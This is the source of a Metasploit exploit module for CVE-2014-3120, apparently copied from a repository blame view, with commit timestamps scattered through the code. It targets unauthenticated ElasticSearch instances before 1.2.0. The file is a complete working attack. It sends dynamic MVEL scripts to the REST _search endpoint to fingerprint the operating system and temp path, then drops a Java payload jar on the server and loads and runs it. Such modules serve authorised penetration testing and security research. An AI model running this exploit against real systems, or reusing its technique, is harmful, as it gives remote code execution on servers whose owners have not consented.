metasploit-framework/modules/exploits/multi/elasticsearch/script_mvel_rce.rb

216 lines
5.7 KiB
Ruby
Raw Normal View History

2014-05-27 23:01:16 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
2014-05-27 23:01:16 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution',
'Description' => %q{
2014-06-02 18:20:01 +00:00
This module exploits a remote command execution (RCE) vulnerability in ElasticSearch,
2014-05-29 17:20:40 +00:00
exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the
2014-06-02 18:20:01 +00:00
REST API, which does not require authentication, where the search
function allows dynamic scripts execution. It can be used for remote attackers
2014-05-29 17:20:40 +00:00
to execute arbitrary Java code. This module has been tested successfully on
ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3.
2014-05-27 23:01:16 +00:00
},
'Author' =>
[
'Alex Brasetvik', # Vulnerability discovery
'Bouke van der Bijl', # Vulnerability discovery and PoC
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-3120'],
['OSVDB', '106949'],
['EDB', '33370'],
['URL', 'http://bouk.co/blog/elasticsearch-rce/'],
['URL', 'https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch']
],
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'ElasticSearch 1.1.1 / Automatic', { } ]
],
'DisclosureDate' => 'Dec 09 2013',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(9200),
OptString.new('TARGETURI', [ true, 'The path to the ElasticSearch REST API', "/"]),
OptString.new("WritableDir", [ true, "A directory where we can write files (only for *nix environments)", "/tmp" ])
], self.class)
end
def check
result = Exploit::CheckCode::Safe
if vulnerable?
result = Exploit::CheckCode::Vulnerable
end
result
end
def exploit
2014-06-02 18:20:01 +00:00
print_status("#{peer} - Trying to execute arbitrary Java...")
2014-05-27 23:01:16 +00:00
unless vulnerable?
fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...")
end
2014-06-02 18:20:01 +00:00
print_status("#{peer} - Discovering remote OS...")
2014-05-27 23:01:16 +00:00
res = execute(java_os)
result = parse_result(res)
if result.nil?
2014-06-02 18:20:01 +00:00
fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...")
2014-05-27 23:01:16 +00:00
else
2014-06-02 18:20:01 +00:00
# TODO: It'd be nice to report_host() with this info.
2014-06-02 19:22:01 +00:00
print_good("#{peer} - Remote OS is '#{result}'")
2014-05-27 23:01:16 +00:00
end
jar_file = ""
if result =~ /win/i
2014-06-02 18:20:01 +00:00
print_status("#{peer} - Discovering TEMP path")
2014-05-27 23:01:16 +00:00
res = execute(java_tmp_dir)
result = parse_result(res)
if result.nil?
2014-06-02 18:20:01 +00:00
fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...")
2014-05-27 23:01:16 +00:00
else
2014-06-02 19:22:01 +00:00
print_good("#{peer} - TEMP path identified: '#{result}'")
2014-05-27 23:01:16 +00:00
end
jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar"
else
jar_file = File.join(datastore['WritableDir'], "#{rand_text_alpha(3 + rand(4))}.jar")
end
register_file_for_cleanup(jar_file)
execute(java_payload(jar_file))
end
def vulnerable?
2015-03-10 14:39:02 +00:00
java = 'System.getProperty("java.class.path")'
2014-05-27 23:01:16 +00:00
2015-03-10 14:39:02 +00:00
vprint_status("#{peer} - Trying to execute 'System.getProperty(\"java.version\")'...")
2014-05-27 23:01:16 +00:00
res = execute(java)
result = parse_result(res)
if result.nil?
2015-03-10 14:39:02 +00:00
vprint_status("#{peer} - No results for the Java test")
2014-05-27 23:01:16 +00:00
return false
2015-03-10 14:39:02 +00:00
elsif result =~ /elasticsearch/
vprint_status("#{peer} - Answer to Java test: #{result}")
return true
2014-05-27 23:01:16 +00:00
else
2015-03-10 14:39:02 +00:00
vprint_status("#{peer} - Answer to Java test: #{result}")
return false
2014-05-27 23:01:16 +00:00
end
end
def parse_result(res)
unless res
vprint_error("#{peer} no response")
return nil
end
unless res.code == 200 && res.body
vprint_error("#{peer} responded with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)")
2014-05-27 23:01:16 +00:00
return nil
end
begin
json = JSON.parse(res.body.to_s)
rescue JSON::ParserError
return nil
end
begin
result = json['hits']['hits'][0]['fields']['msf_result']
2014-05-27 23:01:16 +00:00
rescue
return nil
end
result.is_a?(::Array) ? result.first : result
2014-05-27 23:01:16 +00:00
end
def to_java_byte_array(str)
buff = "byte[] buf = new byte[#{str.length}];\n"
i = 0
str.unpack('C*').each do |c|
buff << "buf[#{i}] = #{c};\n"
i = i + 1
end
buff
end
def java_os
"System.getProperty(\"os.name\")"
end
def java_tmp_dir
"System.getProperty(\"java.io.tmpdir\");"
end
def java_payload(file_name)
source = <<-EOF
import java.io.*;
import java.lang.*;
import java.net.*;
#{to_java_byte_array(payload.encoded_jar.pack)}
File f = new File('#{file_name.gsub(/\\/, "/")}');
FileOutputStream fs = new FileOutputStream(f);
bs = new BufferedOutputStream(fs);
bs.write(buf);
bs.close();
bs = null;
URL u = f.toURI().toURL();
URLClassLoader cl = new URLClassLoader(new java.net.URL[]{u});
Class c = cl.loadClass('metasploit.Payload');
c.main(null);
EOF
source
end
def execute(java)
payload = {
"size" => 1,
"query" => {
"filtered" => {
"query" => {
"match_all" => {}
}
}
},
"script_fields" => {
"msf_result" => {
"script" => java
}
}
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, "_search"),
'method' => 'POST',
'data' => JSON.generate(payload)
})
return res
end
end